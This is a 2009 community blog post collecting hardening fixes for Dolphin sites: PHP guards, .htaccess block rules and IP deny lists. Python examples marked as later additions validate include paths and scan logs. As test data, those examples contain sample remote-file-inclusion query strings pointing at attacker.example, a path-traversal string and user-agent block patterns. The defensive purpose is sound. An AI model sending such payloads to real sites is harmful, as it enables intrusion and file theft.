Dolphin Security Roundup - Has Your Site Been Hacked?

jtadeo posted 22nd of May 2009 in Community Voice. 15 comments.

At some point in your site's existence, there will be attempts made to hack your site. I know several months ago there was a rash of Dolphin sites being compromised, as hackers had intensely targeted the app.

To be clear, this is not limited to Dolphin but applies to all apps. All sites get hacked.

Hackers have compromised sites like Facebook, MySpace and Twitter, and I am sure many others that have been or have yet to be reported. While you can't stop a hacker from trying to get to your site, you can definitely make it more work by applying some of the techniques listed below. I've rounded up the first batch in this blog. This is a compilation of the ones I've found very helpful. There are others, I am sure, and if you have a link, please send it to me for inclusion.


RAY FILES - HTMLSax3 Fix for dolphin exploit

SOURCE: sammie - http://www.boonex.com/unity/blog/entry/Fix_for_dolphin_exploit

1. Add the following to your ray/modules/global/inc/content.inc.php :

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

So that, when you're done it looks like this:

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");

This prevents hackers from supplying sIncPath in the request and so using remote include files against your site.

2. Add the following to your /plugins/safehtml/HTMLSax3.php:

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

So when you're done, it looks like this:

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );

This prevents a request from overriding $dir, and so remote access to your directories through these includes.
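What the isset() gate above protects against is register_globals turning a request parameter into the very variable that require_once() then uses as a path. The following is an added Python example, not code from the original post or from sammie's fix, showing the two checks an include site needs: refuse any request that supplies a protected variable name at all (the gate above), and resolve the include name under a fixed base directory so that a URL, an absolute path or a ../ traversal never reaches the include. The install path, the protected-name list and the request values are constructed for the example.

```python
import os
from urllib.parse import urlsplit

# Names the Ray include files build paths from (taken from the two fixes above).
# With register_globals on, a request parameter of the same name would become
# the PHP variable before require_once() runs; the fix refuses such requests.
PROTECTED_NAMES = frozenset({"sIncPath", "dir"})


def merged_request(get=None, post=None, cookies=None):
    """Approximate PHP's $_REQUEST: GET, POST and cookie values in one dict."""
    merged = {}
    for source in (get or {}, post or {}, cookies or {}):
        merged.update(source)
    return merged


def request_injects_include_path(request):
    """Equivalent of the isset($_REQUEST[...]) gate for every protected name.
    True means the request must be refused before any include runs."""
    return any(name in request for name in PROTECTED_NAMES)


def safe_include_path(base_dir, filename):
    """Resolve filename under base_dir for inclusion.

    Returns the absolute path to include, or None when the name carries a URL
    scheme (remote include), is absolute, or escapes base_dir by traversal.
    """
    if urlsplit(filename).scheme:           # http:, ftp:, php:, data: ...
        return None
    if os.path.isabs(filename):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    base = "/srv/www/dolphin/ray/modules/global/inc"   # hypothetical install path
    # Constructed requests: the second one carries the injected variable.
    for req in (merged_request(get={"id": "5"}),
                merged_request(get={"sIncPath": "http://attacker.example/x.txt"})):
        print(req, "->", "refuse" if request_injects_include_path(req) else "ok")
    # Constructed include names: only the first one is legitimate.
    for name in ("xml.inc.php", "../../../../etc/passwd", "http://attacker.example/x.txt"):
        print(name, "->", safe_include_path(base, name))
```

PHP's $_REQUEST merges GET, POST and cookies, which is why the gate has to look at all three; merged_request() mimics that. The second check is the one to keep even after register_globals is off, because it makes the include independent of where the path value came from.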


DOLPHIN ROOT - .htaccess file located in the root of your site

SOURCE: Dialme.com

This will block remote files from being included via the query string, and block two common download tools by user agent:

RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]

Block others from viewing your .htaccess file in a web browser (near the bottom of yoursite.com/.htaccess add):

<Files .htaccess>
deny from all
</Files>

You can also deny IP addresses singly or in ranges:

<Files *>
order deny,allow
deny from 191.0.0.0
deny from 195.0.0.0
</Files>

<Files *>
deny from 124.187.
deny from 58.0.0.0/8
allow from 58.121.39.45
</Files>

FOR ALL DIRECTORIES THAT HAVE BEEN 777'D

SOURCE: Dialme.com

.htaccess files are recursive, meaning that if you put one in a directory all of its subdirectories are affected. So in my media directory I block ALL scripts with the code below.

That "LimitExcept" also blocks all "PUT" and "POST" requests. You CAN'T use this in a directory that has .php files inside it, or in any of its sub-dirs. But it SHOULD be inside ALL the /files directories for each Ray widget, and the /media directory.

Sample locations:
yoursite.com/media/.htaccess
yoursite.com/ray/modules/movie/files/.htaccess
yoursite.com/ray/modules/mp3/files/.htaccess
yoursite.com/ray/modules/music/files/.htaccess

Code:

<LimitExcept GET>
Order deny,allow
deny from all
</LimitExcept>

<FilesMatch "\.(cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|js.*|gz|tgz|tar|php.*|htm.*)$">
Deny from all
</FilesMatch>


LOCK DOWN THE ADMIN FOLDER

SOURCE: Dialme.com

Let's make it so that even if a hacker gets your credentials out of your database he STILL can't get into the admin. Put this inside the .htaccess that is in your /admin directory:

For example:

<Files *>
order deny,allow
deny from all
allow from 192.168.0.1
</Files>

The IP addresses listed will be allowed to access the admin.

This way, even if someone gets YOUR password and login, they STILL can't get inside the admin area.

*If your IP changes then this probably isn't the best solution. You will still be able to access FTP regardless of your IP address; this just blocks web access to your admin folder from anything other than the IPs specified. So even if your IP did change, you can just FTP into your admin directory and update the IPs to allow with your new address.
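The IP-based blocks above (the deny lists in the Dolphin Root section and the allow-list for /admin) both rely on how Apache evaluates Order, Deny and Allow, which is easy to get wrong. Below is an added Python example, not code from the original post or from Dialme.com, that parses such a block and answers "would this client be let in?" using the Apache 2.2 mod_authz_host semantics for "all", CIDR blocks, full addresses and partial dotted prefixes; it also handles Order allow,deny, which the post does not use. The three blocks are the post's own, embedded as constructed strings, and the client addresses are constructed.

```python
import ipaddress

# The three blocks from the post, embedded here as constructed strings.
SINGLE_BLOCK = """<Files *>
order deny,allow
deny from 191.0.0.0
deny from 195.0.0.0
</Files>"""

RANGE_BLOCK = """<Files *>
deny from 124.187.
deny from 58.0.0.0/8
allow from 58.121.39.45
</Files>"""

ADMIN_BLOCK = """<Files *>
order deny,allow
deny from all
allow from 192.168.0.1
</Files>"""


def pattern_matches(pattern, addr):
    """Match one 'from' argument as Apache 2.2 mod_authz_host does: 'all', a CIDR
    block, a full address, or a partial dotted prefix such as '124.187.'."""
    if pattern == "all":
        return True
    if "/" in pattern:
        return addr in ipaddress.ip_network(pattern, strict=False)
    octets = pattern.rstrip(".").split(".")
    if len(octets) == 4:
        return addr == ipaddress.ip_address(pattern)
    return str(addr).split(".")[:len(octets)] == octets


class HostAccessPolicy:
    """Order/Deny/Allow rules from one <Files> or <LimitExcept> container."""

    def __init__(self, order="deny,allow"):
        self.order = order          # Apache's default when Order is omitted
        self.rules = []             # (verb, pattern) in file order

    def is_allowed(self, ip):
        addr = ipaddress.ip_address(ip)
        deny_hit = any(v == "deny" and pattern_matches(p, addr) for v, p in self.rules)
        allow_hit = any(v == "allow" and pattern_matches(p, addr) for v, p in self.rules)
        if self.order == "deny,allow":
            # Refused only if a Deny matches and no Allow rescues it; default is allow.
            return allow_hit or not deny_hit
        # allow,deny and mutual-failure: needs a matching Allow and no matching Deny.
        return allow_hit and not deny_hit


def parse_access_block(text):
    """Read Order, Deny and Allow lines from .htaccess-style text; container tags
    and comments are skipped, and hostname arguments are not supported."""
    policy = HostAccessPolicy()
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0][0] in "#<":
            continue
        verb = parts[0].lower()
        if verb == "order" and len(parts) > 1:
            policy.order = "".join(parts[1:]).lower()
        elif verb in ("deny", "allow") and len(parts) == 3 and parts[1].lower() == "from":
            policy.rules.append((verb, parts[2].lower()))
    return policy


if __name__ == "__main__":
    for name, block, clients in (
        ("single addresses", SINGLE_BLOCK, ("191.0.0.0", "191.0.0.1")),
        ("ranges", RANGE_BLOCK, ("58.1.2.3", "58.121.39.45", "124.187.9.9", "124.188.0.1")),
        ("admin", ADMIN_BLOCK, ("192.168.0.1", "203.0.113.5")),
    ):
        policy = parse_access_block(block)
        for client in clients:
            print(f"{name:<17} {client:<15} {'allow' if policy.is_allowed(client) else 'deny'}")
```

Running it shows one caveat worth knowing: "deny from 191.0.0.0" denies exactly that one address, not the whole 191.x.x.x range; to cover the range use the partial form "deny from 191." or "deny from 191.0.0.0/8", as the second block does for 58.0.0.0/8. Under Order deny,allow the later "allow from 58.121.39.45" wins over the /8 deny, and the same rule is what makes the admin allow-list work. Apache 2.4 replaces these directives with Require ip, so check which version your host runs.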


HIDE THE HOMEPAGE

Source: MakeASocialNetwork.com

Several of the hacking groups only do one thing when they DO get in: they change your homepage to their logo (defacement). Just like #1 this is automated: they overwrite index.php or add one. Well, what if your homepage isn't index.php? Even if their bot gets one in, none of your visitors will ever know :-) How? Simple: rename your index.php (in this example to myindex.php) and then put this in your .htaccess:

DirectoryIndex myindex.php

and inside the mod_rewrite block:

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /index\.php\ HTTP/
RewriteRule ^index\.php$ http://www.yoursite.com/ [R=301,L]

So any request for http://www.yoursite.com/index.php will be redirected to http://www.yoursite.com/, and the new homepage is really myindex.php.
If you do this then you need to put a line setting it back to index.php inside all the other directories (like admin and ray), OR change it in them too.
Let them wrap their minds around why they got their bogus file in but it isn't showing :-)


REDIRECT THEM IF THEY'RE NOT SUPPOSED TO BE THERE USING PHP

Source: BoonexNerd.net

Add an index.php file in the root of a directory that you want to access only if the person knows the exact URL. You can add the following to the index.php file:

<?php
header( "HTTP/1.1 301 Moved Permanently" );
header( "Status: 301 Moved Permanently" );
header( "Location: http://www.boonexnerd.net" );
//exit(0); //jt note - stops anything after the redirect from running; in some cases you may need to uncomment this. To uncomment, delete the two forward slashes in front of exit(0)
?>


REDIRECT THEM IF THEY'RE NOT SUPPOSED TO BE THERE USING .HTACCESS

Source: BoonexNerd.net

Another way to redirect a curious user is by adding the following to your .htaccess file. The example below redirects traffic from my Boonexnerd.com site over to my Boonexnerd.net site:

#-------------------------Redirect START --------------------------------------
#Apache mod_rewrite module must be enabled in order for this redirect to work
RewriteCond %{HTTP_HOST} ^www\.boonexnerd\.com$ [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]

#HTTP_HOST holds only the host name, so the /testredirect/ path is matched in the RewriteRule
RewriteCond %{HTTP_HOST} ^boonexnerd\.com$ [NC]
RewriteRule ^testredirect/(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
#-------------------------Redirect END --------------------------------------

Just replace my domain with yours. One question you may ask is, "Where do I put this thing?". Here's an example of placement:

Open your .htaccess file and add this to the file:

<IfModule mod_rewrite.c>
RewriteEngine on

#-------------------------Redirect START --------------------------------------
#Apache mod_rewrite module must be enabled in order for this redirect to work
RewriteCond %{HTTP_HOST} ^www\.boonexnerd\.com$ [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]

#HTTP_HOST holds only the host name, so the /testredirect/ path is matched in the RewriteRule
RewriteCond %{HTTP_HOST} ^boonexnerd\.com$ [NC]
RewriteRule ^testredirect/(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
#-------------------------Redirect END --------------------------------------

RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]
</IfModule>
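The query-string and user-agent conditions at the end of the block above (first given in the Dolphin Root section and repeated here to show placement) can be replayed against an access log to see which past requests they would have refused, and to check how much they actually cover. The following is an added Python example, not code from the original post or from Dialme.com; the log lines are constructed samples in Apache combined format using documentation addresses and .example hostnames, and the stricter pattern set is my own suggestion rather than anything from the page.

```python
import re

# Apache "combined" log format; the request target is later split into path and query.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The RewriteCond patterns exactly as the post gives them (case-sensitive, no [NC]).
PAGE_QUERY_PATTERNS = [re.compile(p) for p in (r"^http", r"^.+www\.", r"^.+https", r"^.+ftp")]
PAGE_AGENT_PATTERNS = [re.compile(p) for p in (r"^libwww", r"^Wget")]

# Suggested stricter variant (an assumption, not from the post): a URL scheme at
# the start of any parameter value, raw or percent-encoded, in any letter case.
STRICT_QUERY_PATTERNS = [
    re.compile(r"(?:^|[=&])(?:https?|ftp)(?::|%3a)(?:/|%2f)", re.IGNORECASE)
]

# Constructed sample lines (RFC 5737 documentation addresses, .example hostnames).
SAMPLE_LOG = [
    '203.0.113.10 - - [22/May/2009:10:15:01 +0000] "GET /ray/modules/global/inc/content.inc.php?sIncPath=http://www.attacker.example/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [22/May/2009:10:15:02 +0000] "GET /ray/modules/global/inc/content.inc.php?sIncPath=http://198.51.100.7/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [22/May/2009:10:15:03 +0000] "GET /robots.txt HTTP/1.1" 200 64 "-" "Wget/1.11.4"',
    '192.0.2.33 - - [22/May/2009:10:15:04 +0000] "GET /search.php?q=dolphin+themes HTTP/1.1" 200 2048 "http://www.mysite.example/" "Mozilla/5.0"',
    '192.0.2.34 - - [22/May/2009:10:15:05 +0000] "POST /member.php HTTP/1.1" 302 0 "-" "libwww-perl/5.805"',
]


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["path"], _, entry["query"] = entry["target"].partition("?")
    return entry


def classify(entry, query_patterns=PAGE_QUERY_PATTERNS, agent_patterns=PAGE_AGENT_PATTERNS):
    """Return the reasons the rules would refuse this request ([] if none)."""
    reasons = []
    if any(p.search(entry["query"]) for p in query_patterns):
        reasons.append("query_string")
    if any(p.search(entry["agent"]) for p in agent_patterns):
        reasons.append("user_agent")
    return reasons


def scan(lines, query_patterns=PAGE_QUERY_PATTERNS, agent_patterns=PAGE_AGENT_PATTERNS):
    """Return (client ip, path, reasons) for every parseable line the rules would block."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry, query_patterns, agent_patterns)
        if reasons:
            hits.append((entry["ip"], entry["path"], tuple(reasons)))
    return hits


if __name__ == "__main__":
    for label, qp in (("page rules", PAGE_QUERY_PATTERNS), ("strict rules", STRICT_QUERY_PATTERNS)):
        print(label)
        for ip, path, reasons in scan(SAMPLE_LOG, query_patterns=qp):
            print(f"  {ip:<14} {path:<45} {', '.join(reasons)}")
```

The post's patterns are applied exactly as written, and the run shows their coverage: the request whose query string carries http://www.attacker.example/ is caught by "^.+www\.", but the same request pointed at a bare IP address is not, because "^http" only matches a query string that begins with http, and the other three patterns need "www.", "https" or "ftp" somewhere in it. STRICT_QUERY_PATTERNS looks for a URL scheme at the start of any parameter value, raw or percent-encoded and in any case, which closes that gap at the cost of also flagging legitimate parameters that hold full URLs (a redirect target, for instance). The referer field is not consulted, matching the rules; the Wget and libwww-perl lines are refused by user agent alone.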


SET REGISTER GLOBALS TO OFF

SOURCE: http://www.boonex.com/unity/forums/topic/Dolphin-not-secure-Hacked-.htm

gameutopia says:
First thing to do is to determine if register_globals is on or off. You can login to your admin panel first then visit:
yoursite.com/admin/phpinfo.php

Scroll down until you see register_globals
You should see two columns, local and master. Master is what your host has specified, and local would be your site/directory. You can override your host's master value by using .htaccess on PHP Apache servers or php.ini with CGI servers.

The code varies slightly.

For php apache servers add to your main .htaccess file yoursite.com/.htaccess:
php_flag register_globals off

For cgi servers add to or edit your current php.ini file in yoursite.com/php.ini:
register_globals = Off

If you don't have a php.ini, make one with the above line and call it php.ini (CGI servers only).
Otherwise ask your host for the exact location to put php.ini.

Go back to yoursite.com/admin/phpinfo.php and refresh the page to verify the changes were successful, i.e. register_globals changed from on to off for certain in the local value, but if both local and master change that is OK too.


RUN A VIRUS CHECK ON YOUR FILES

Source: BoonexNerd.net

Keep your files healthy. Have a look at some of these FREE antivirus programs:
http://www.avast.com/eng/download-avast-home.html
http://www.free-av.com/


OTHER SITES THAT ARE HELPFUL FOR SECURITY ISSUES

Source: BoonexNerd.net

http://www.wizcrafts.net/chinese-blocklist.html
This will list ip addresses for blocking.

http://www.wizcrafts.net/exploited-servers-blocklist.html
This will list exploited servers.

http://www.changedetection.com/
This will monitor your site for changes.

And these are not necessarily a direct defense against hackers, but services that will alert you if something has gone wrong with your site. They will keep an eye on your site, poll it at set intervals and report any weirdness that may have occurred.

http://www.montastic.com/
http://mon.itor.us/
http://site24x7.com/

The last one on the list I've used, and it will also monitor whether the content on your site has changed, for example if the front page got defaced.

So there you have it, some of the fixes and updates that you may want to add to your own files in order to harden your site just a bit.

And finally, I have a daily list of ip addresses that have attempted to compromise my nerd site. If you are interested in getting the list please let me know. I will send you a daily/weekly report of suspected hackers based on my own server being attacked.

...sip...

 
Comments
theguypc
Fantastic post - thank you!
Thanks a bunch, this will help a lot of ppl as getting your site hacked is a major issue..
HotGate
Very helpful .. even for us. Thumbs up !
mallorca
Great post - thank you!
Juker
James,

Truly valuable and beneficial post. Thank you.

I am very interested in receiving the list of suspected hackers. How do I block the hackers once I have the list? Do I plug them into the Dolphin Root .htaccess mentioned above and are there other places to possibly block them?

Duh?

Juker
jtadeo
Hey Juker :D

Thanks to you and everyone who chimed in. Here's a sample .htaccess file that shows placement of the deny ip addresses:

http://www.boonexnerd.net/dolphin/htaccessSample.txt

In terms of the list, I've used the list from http://www.wizcrafts.net/. I am also making my own list to share with those who want it. It will be a page where you can download the ip addresses who have attempted to hack my site.

...sip...
totallyfreak
boonex should add these line into their original script... what do you think ???
grv
The best post I've seen. Well done Jtadeo.
jtadeo
Thanks guys. I used Google and the handy dandy search bar in this forum to compile this info into a neat package.

When I find useful information I will bookmark it and then take note of the parts that were important.

The reality is I just put it together...he he hee... Much of the credit really goes to the ones who actually wrote the info.

...sip...
Mayki
Nice collection in one place, I agree.
The best way to stop all (or almost all) unwanted spam and similar bots is (if you host on your own server) to use iptables (Linux iptables = firewall) and a script for auto-updating the blacklist.
If someone is interested I can help....
 
 